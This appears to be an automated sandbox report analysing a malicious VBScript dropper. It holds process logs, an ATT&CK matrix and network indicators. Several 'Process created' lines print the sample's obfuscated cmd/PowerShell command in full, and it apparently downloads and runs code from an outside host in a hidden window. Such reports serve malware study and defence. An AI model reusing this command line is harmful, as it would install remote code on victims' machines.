Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4838Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4996Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2472Thread sleep count: 4838 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2472Thread sleep count: 4996 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6188Thread sleep time: -20291418481080494s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: wscript.exe, 00000000.00000003.2155460887.0000021328D82000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2157396890.0000021328D87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155993130.0000021328D87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWM
Source: wscript.exe, 00000000.00000003.2155460887.0000021328DD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2157396890.0000021328DD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155993130.0000021328DD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.2155460887.0000021328D82000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2157396890.0000021328D87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155993130.0000021328D87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW'J
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\wscript.exeNetwork Connect: 149.56.240.127 443Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^^^|%{[char]($_+381)})-join'') ^^^| ^^^&($BqIeP) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^|%{[char]($_+381)})-join'') ^| ^&($BqIeP) "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c "echo $($bqiep = $('{7}{8}{1}' -f $('bxljczkie'.tochararray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^^^|%{[char]($_+381)})-join'') ^^^| ^^^&($bqiep) | c:\windows\syswow64\windowspowershell\v1.0\powershell.exe -window hidden -c -"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $($bqiep = $('{7}{8}{1}' -f $('bxljczkie'.tochararray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^|%{[char]($_+381)})-join'') ^| ^&($bqiep) "
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c "echo $($bqiep = $('{7}{8}{1}' -f $('bxljczkie'.tochararray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^^^|%{[char]($_+381)})-join'') ^^^| ^^^&($bqiep) | c:\windows\syswow64\windowspowershell\v1.0\powershell.exe -window hidden -c -"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $($bqiep = $('{7}{8}{1}' -f $('bxljczkie'.tochararray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^|%{[char]($_+381)})-join'') ^| ^&($bqiep) "Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information221
Scripting		Valid Accounts11
Command and Scripting Interpreter		221
Scripting		111
Process Injection		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Exploitation for Client Execution		1
DLL Side-Loading		1
DLL Side-Loading		21
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Non-Standard Port		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
PowerShell		Logon Script (Windows)Logon Script (Windows)111
Process Injection		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets1
File and Directory Discovery		SSHKeylogging13
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1607480 Sample: analysis.vbs Startdate: 05/02/2025 Architecture: WINDOWS Score: 84 22 s4.histats.com 2->22 24 host85500.info 2->24 30 Sigma detected: WScript or CScript Dropper 2->30 32 Joe Sandbox ML detected suspicious sample 2->32 34 Sigma detected: Script Initiated Connection to Non-Local Network 2->34 8 wscript.exe 14 2->8         started        signatures3 process4 dnsIp5 26 s4.histats.com 149.56.240.127, 443, 49704 OVHFR Canada 8->26 36 System process connects to network (likely due to code injection or exploit) 8->36 38 VBScript performs obfuscated calls to suspicious functions 8->38 40 Wscript starts Powershell (via cmd or directly) 8->40 42 3 other signatures 8->42 12 cmd.exe 1 8->12         started        signatures6 process7 signatures8 44 Wscript starts Powershell (via cmd or directly) 12->44 46 Obfuscated command line found 12->46 15 powershell.exe 15 17 12->15         started        18 conhost.exe 12->18         started        20 cmd.exe 1 12->20         started        process9 dnsIp10 28 host85500.info 45.93.9.167, 15322, 49705 VMAGE-ASRU Russian Federation 15->28

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
analysis.vbs7%VirustotalBrowse
analysis.vbs3%ReversingLabsWin32.Dropper.Generic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://s4.histav20%Avira URL Cloudsafe
https://s4.hista0%Avira URL Cloudsafe
https://s4.histatl20%Avira URL Cloudsafe
http://www.microsoft.cot0%Avira URL Cloudsafe

Domains and IPs

Download Network PCAP: filteredfull

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
host85500.info
45.93.9.167
truefalse
    		unknown
    s4.histats.com
    		149.56.240.127
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://s4.histats.com/stats/0.php?4926118&@f16&@g1&@h1&@i1&@vhttps://histats.com/d_openedfalse
        		high
        NameSourceMaliciousAntivirus DetectionReputation
        https://s4.histats.com/stwscript.exe, 00000000.00000002.2157030674.0000021326C46000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155969410.0000021326C3F000.00000004.00000020.00020000.00000000.sdmpfalse
          		high
